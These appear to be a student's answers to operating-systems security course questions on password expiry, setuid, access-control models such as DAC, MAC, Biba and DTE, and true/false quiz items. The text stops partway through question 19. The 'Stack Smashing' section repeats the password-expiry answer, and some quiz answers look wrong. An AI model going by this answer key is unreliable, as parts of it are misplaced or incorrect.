%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 9) Password Expiry Rules What is the most important reason for enforcing password expiry rules? What is the most important drawback? An attacker usually takes an average (expected) time $ t_{guess}$ to guess some specific password. Probability theory states a maximum on $t_{guess}$, when the selection of any of a set of possible passwords is equiprobable. M. Bishop \cite{bishop} argues that changing passwords in a time inferior than $ t_{guess}$ would reduce the probability of guessing/using this password. However, attackers try short passwords as initial guesses and if the user chooses a weak password, the time for guessing would be inferior than $ t_{guess}$. Therefore, password expiry rules should come with other policy mechanisms. If a password is already compromised, the requirement of changing it regularly could limit the access time, $t_{access}$, for the attacker (who would use it for an indefinite period). On another hand, a compromised password is usually used immediately, for example, to install a {\it backdoor}\footnote{Method of bypassing normal authentication, taking the form of an installed program or subverting the system through a {\it rootkit}, i.e. software that enables continued privileged access to a system while hidden.}. A password changing in this case would not prevent future attacker access. If the user has already a truly strong password, the advantages of changing it are not so evident. G. Spafford \cite{spafford} and Grampp $\&$ Morris \cite{gp} claim that enforcing expiration of strong passwords would introduce the risk that the new password becomes weaker. Moreover, users rarely choose passwords that are both hard to guess and easy to remember. Having to choosing new passwords periodically might tend to easy-to-remember and easy-to-guess passwords. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 10) Stack Smashing What is the most important reason for enforcing password expiry rules? What is the most important drawback? An attacker usually takes an average (expected) time $ t_{guess}$ to guess some specific password. Probability theory states a maximum on $t_{guess}$, when the selection of any of a set of possible passwords is equiprobable. M. Bishop \cite{bishop} argues that changing passwords in a time inferior than $ t_{guess}$ would reduce the probability of guessing/using this password. However, attackers try short passwords as initial guesses and if the user chooses a weak password, the time for guessing would be inferior than $ t_{guess}$. Therefore, password expiry rules should come with other policy mechanisms. If a password is already compromised, the requirement of changing it regularly could limit the access time, $t_{access}$, for the attacker (who would use it for an indefinite period). On another hand, a compromised password is usually used immediately, for example, to install a {\it backdoor}\footnote{Method of bypassing normal authentication, taking the form of an installed program or subverting the system through a {\it rootkit}, i.e. software that enables continued privileged access to a system while hidden.}. A password changing in this case would not prevent future attacker access. If the user has already a truly strong password, the advantages of changing it are not so evident. G. Spafford \cite{spafford} and Grampp $\&$ Morris \cite{gp} claim that enforcing expiration of strong passwords would introduce the risk that the new password becomes weaker. Moreover, users rarely choose passwords that are both hard to guess and easy to remember. Having to choosing new passwords periodically might tend to easy-to-remember and easy-to-guess passwords. -------------------------------------------------------------------------------------- a) Justify: -------------------------------------------------------------------------------------- --> Privileged mode of operation on processors provides basis for OS security. The operating systems provide different levels of access to resources. Lower-privileged levels may attempt to bypass to the higher-privileged levels so it's necessary a physical security to protect hardware and hardware protects kernel (which provides acess controls mechanism). The levels of privilege in the architecture of a computer system should be hardware-enforced by the CPU, by different modes of execution (protection primitives). For example, In x86 they are the protection rings, where 0 has most privileges (interacting with CPU and memory). The access between levels must assure security, preventing process from one privilege level to acess others. Certain instructions are permitted only in the privileged mode, for example all user processes can be executed in unprivileged mode, while the OS kernel executes in privileged mode. Compiter systems that don't have a trusted base as part of their design are only exertenally secure, since all operations are axiomatic, i.e. there is no denying that computer could be programmed to perform undesirable processes. --> Without memory protection, secure acess control mechanisms cannot be provided by OS. Operating systems support multi-programming and they need ensure protection against one process affecting the data in the memory of other process. Without memory protection, OS protection mechanisms may be bypassed. It's necessary to ensure that the process does not share objects in memory with any other, and that other process cannot access the memory of a privileged process. For instance, if memory is not protected, a process can take control of a system by controling the it when in its monitor mode. Moreover, the configuration of memory should be based on the principle of least privilege, for example, if a section of memory does not have executable instructions, it should not have execute permission, if a section of memory are not to be altered, it should be read-only, etc. -------------------------------------------------------------------------------------- b) How are system calls implemented on UNIX? How can the services if kernel code, that needs to operate in privileged mode, accessed in a secure fashion by non-OS code? --------------------------------------------------------------------------------------- The architherure of processors involves a security model (e.g. the previous rings model) which specifies privilege levels for processes. User level processes sometimes need to access OS kernel processes. This is implemented by system calls, a call from unprivileged code to privileged code, i.e. privilege escalation through trusted programs (interrupt handler address register). These system calls are available by the operating system to provide safe implementations for such operations. Implementing system calls means control transfers, putting the CPU into the required privilege level and then giving the control to the kernel. The kernel autorizates the requested service, executes the set of instructions (which the calling process does not have any control), and returns the control to the calling process (with its old privilege mode). Examples of system calls in UNIX are open, read, write, close, execve, fork, exit, and kill. -------------------------------------------------------------------------------------- c) What is the difference between privileged processes on UNIX and priviled mode of execution? -------------------------------------------------------------------------------------- To distinguish between the execution of operating-system code and user code, computer systems provide hardware support differentiating among various modes of execution, for example, user mode and kernel mode. The mode bit is added to the hardware of the computer to indicate the current mode: kernel (0) or user (1), distinguishing a process executed by the operating system (kernel mode) from one executed by the user. The hardware allows privileged instructions to be executed only in kernel mode, i.e. in an attempt to execute a privileged instruction in user mode, the hardware does not execute it. On the other hand, in UNIX every system resource is a file (excpetions to resources, e.g. TCP connections), i.e. an object. The OS sees any file as a sequence of bytes: no internal structure is imposed by the operating system. Permissions are associated with persistent objects. Therefore, the operational system needs to set acess control rules to define priviled procesess that are able to acess specifics objects. This is is performed through the use of numeric identifiers, giving permisions to objetcts, specified by users (ownsers). -------------------------------------------------------------------------------------- d) Current OSes support ACLs but not capabilities. Why? -------------------------------------------------------------------------------------- Capabilities are harder to implement than ACLs. Among many reasons, one is the revocation of rights. Revoking access to an object requires that all the capabilities granting access to that object be revoked, so each process should be checked, and the capabilities deleted, giving a high cost of operation. Therefore, capabilities must be associated with an expiry date, which demands additional management cost/planing. -------------------------------------------------------------------------------------- e) What would you do to make sure that by default, all files that you create on a UNIX system have group and world readability, but gives write permission only to the file owner? -------------------------------------------------------------------------------------- We use umask command (function in POSIX enviroments), which sets the default file creation mode in UNIX. The files created by processes have fumm permission, for example 666 (rw-rw-rw) for files or 777 (rwxrwxrwx) for directory (executable here means you can cd into the directory). If we want default permision u = 6(rw), g = 4 (r), o = 4 (r), i.e 644, we set our umask to 022. Moreover, we can add umask command to startup file like .bashrc for all future login sessions. -------------------------------------------------------------------------------------- f) What is a setuid program? What is a setuid-to-root program? -------------------------------------------------------------------------------------- In UNIX, the system sets to each file an owner, a group owner and an everybody else access control. The permissions for each of them are divided into 3 parts (read/write/execute access). Together with these 9 bits there are 3 additional bits: SUID, GUID and Sticky bit. If the SUID bit is set, a process can assume the USERID of the owner of the file (delegation). When any program is executed, it creates a process with 3 ID numbers: real, effective (euid), and saved. Running a setuid program changes the euid of the process from the owner to the object. For example, su or login, changing ruid and euid. If this program is a setuid to root, the user gains all privileges available to root (USERID 0), i.e. total control of the system. For example, sudo, ping. -------------------------------------------------------------------------------------- g) In UNIX, setuid bits are not honored on certain file systems such as the floppy drive. What would be the secuity loopholes that would arise if we honor the setuid bit on all file systems. -------------------------------------------------------------------------------------- Mount devices shoud be mount with nosuid option. Otherwise a security loophole would be, for example, an attacker able to setuid a copy of a bash on a disk and having a shell with higher (root) privileges. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 11) -------------------------------------------------------------------------------------- a) What weaknesses of DAC motivate MAC? -------------------------------------------------------------------------------------- When an user sets an access control mechanism to an object, it is a discretionary access control (DAC), when a system controls access to an object and an user cannot modify this access, it is a mandatory access control (MAC). DAC does not differentiate between users and proceses, where in MAC, the permisions are not controled by the individual user. Therefore, DAC is based on the commitement of the files's owners to correctly set the permisions, which may not alway happen due lacking of knowledge or care. This motivates a control mecanism where permissions are set by a centralized process and where it is ensured that determined polices are going to be followed. -------------------------------------------------------------------------------------- b) The interpretation of confidentiality labels differ from of integrity labels on files? -------------------------------------------------------------------------------------- They are different concepts. An integrity label on an object ensures reliablity of contained data, resulting from a past verification procedure. It ensures that the object can only be modified by authorized acesses. A confidentiality label on an object ensures that the object can only have authorized accesses (secrecy or privacy) and defines a policy for future use. In the context of multi level security (MLS) access control, they differ on their two level policies. Confiduaity usually has the 'No read up' and 'No Write Down' policies, where the first ensures no unautorized accesses to a high classified level and the second ensures no leaking of higher classified information to a lower one. On the other hand, integrity has 'No read down' and 'No Write up' policies, where the first ensures that the higher integrity data wont be exposed to lower integrity ones and the second that lower integrity level wont write in higher ones. -------------------------------------------------------------------------------------- c) Explain the problem with the basic Biba model that is addressed by the LOMAC model. -------------------------------------------------------------------------------------- In the Biba Model, the 'no read-down' policy ensures that the integrity of an object will not be compromised by reading a lower integrity data, restrincting a subject from reading objects. In the Low Water Mark Policy (LOMAC), subjects are allowed to read objects (read-downs downgradings) by copying the lower integrity file and downgrading the copy process (subject). This subject is then allowed to read the copied object. Unlike Biba, LOMAC permits higher integrity subjects to read from lower integrity objects, but then downgrades the label on the subject preventing future writes to higher integrity objets. -------------------------------------------------------------------------------------- d) Summarize main difficulties with MLS that has precluded their use in commercial OSes. ------------------------------------------------------------------------------------- The dificulties with MLS are the information flow problems such as: * Label Creep: where objects become more and more sensitive for lower level subjects (objects tend to usually get higher labels with time). * It does not deal with the creation or destruction of subjects or object. * Labelling all the objects of the system can be difficult for a large system (difficult to configure the whole system). * But mostly, there should be exceptions for labels, i.e. the system cannot accommodate operations very well without many exceptions. It requires 'trusted subjects' (trusted programs) that can bypass the security model. This does not work well with modern software environments. -------------------------------------------------------------------------------------- e) What is the central problem with MLS that can be addressed by DTE? -------------------------------------------------------------------------------------- The central problem with MLS is that too many programs can be tagged as trusted and some of them can hide vulnerabilities. Domain and Type enforcement (DTE) is an access control mechanism that controls how the accesses are granted to programs, defining domains (set of subjects) and types (set of objects), expressing limited trust to these programs. DTE policies control restriction of accesses from domains to types and from one domain to other domains, granting a program only the rights that it needs to perform its fuction (principle of least privilege). -------------------------------------------------------------------------------------- f) What are the main drawbacks of DTE? ------------------------------------------------------------------------------------- Issues are scability (it becomes one domain for each application) and complexity (difficult to develope and administer). %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -------------------------------------------------------------------------------------- 12) Security mechanisms are layered, i.e., security of a higher layer is based on the security mechanisms provided by the lower layer. Now, suppose that a layer is not trustworthy. Is there a way to build a secure mechanism on top? Give one example where it is possible, another where it is not. Your answer should be no longer than 60 words. -------------------------------------------------------------------------------------- An example is running X-server, which needs to acess hardware resources. To run it without root, we can have a lower layer that access a safe set of operations, which can be called by the user (it can be started as a root process from boot scripts). Counter-example are process that requires directly setuid programs. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -------------------------------------------------------------------------------------- 13) State the principle of least privilege. How does its application make a process more secure? (40 words or less.) -------------------------------------------------------------------------------------- The principle of Secure System Design called of 'Least Privilege' states that every process (program/user) of the system should operate using the least set of necessary privileges. This limits damages and the number of interactions among privileged processes(avoiding misuses). %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -------------------------------------------------------------------------------------- 14) Among the following measures, identify if each measure provides increased protection against online attacks (L), offline attacks (F), or both (B). -------------------------------------------------------------------------------------- L Introducing delays before prompting for passwords after each incorrect password. L Account lock-out after three unsuccessful login attempts. (Online attacks require an attacker to type the password on the target system, and make it perform the authentication.) B Use of salt in UNIX passwords. F Storing only encrypted versions of passwords on the system. L Making encrypted password file unreadable except by root. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -------------------------------------------------------------------------------------- 15) Which of the following statements are true about the concept of capabilities? -------------------------------------------------------------------------------------- T Capabilities correspond to the row-wise representation of an access control matrix. (Such a matrix has userids corresponding to rows and resources corresponding to columns.) T UNIX file descriptors represent a form of capabilities. F Contemporary OSes don’t use capabilities to control access to persistent resources, but may use them to mediate access to transient objects. (In UNIX, permissions are associated with persistent objects. No explicit permissions exist on transient objects like sockets). F POSIX capabilities represent a partial implementation of capabilities. (Computer science capacibilities and POSIX are different concepts). T Kerberos tickets are capabilities. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ------------------------------------------------------------------------------------- 16) Which of the following statements about setuid/setgid mechanism are correct? -------------------------------------------------------------------------------------- T setuid mechanism provides a way for a user to delegate her privileges to a program, so that these privileges are available to the program even when it is run by a different user. T setgid bit should be disabled on removable media drives T setuid provides a mechanism for privilege amplification. F every privileged process is started via the execution of a setuid-to-root program F a problem with setuid programs is that no one can use a debugger on them. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -------------------------------------------------------------------------------------- 17) Which of the following statements are correct? -------------------------------------------------------------------------------------- F SELinux relies on system-call interception to enforce DTE policies. T Clark-Wilson policy is aimed at integrity rather than confidentiality. T Chinese Wall policy is aimed at both confidentiality and integrity. F Information flow policies can be used for protecting confidentiality but not integrity. F SELinux relies on MAC, but does not use DAC. F Separation of duty is a principle designed to ensure that each well-formed transaction preserves data consistency/integrity. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -------------------------------------------------------------------------------------- 18) On Windows, the key sequence Ctrl-Alt-Del causes the operating system to assume command of the keyboard and prevent key strokes from reaching other user-level processes. Which security principle or property is most closely related to this behavior? -------------------------------------------------------------------------------------- It's a Trusted Path, a mechanism ensuring the integrity of the communication channels, i.e. a secure way for a user to communicate to the system performing authentication. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -------------------------------------------------------------------------------------- 19) Identify the key advantage of DTE over 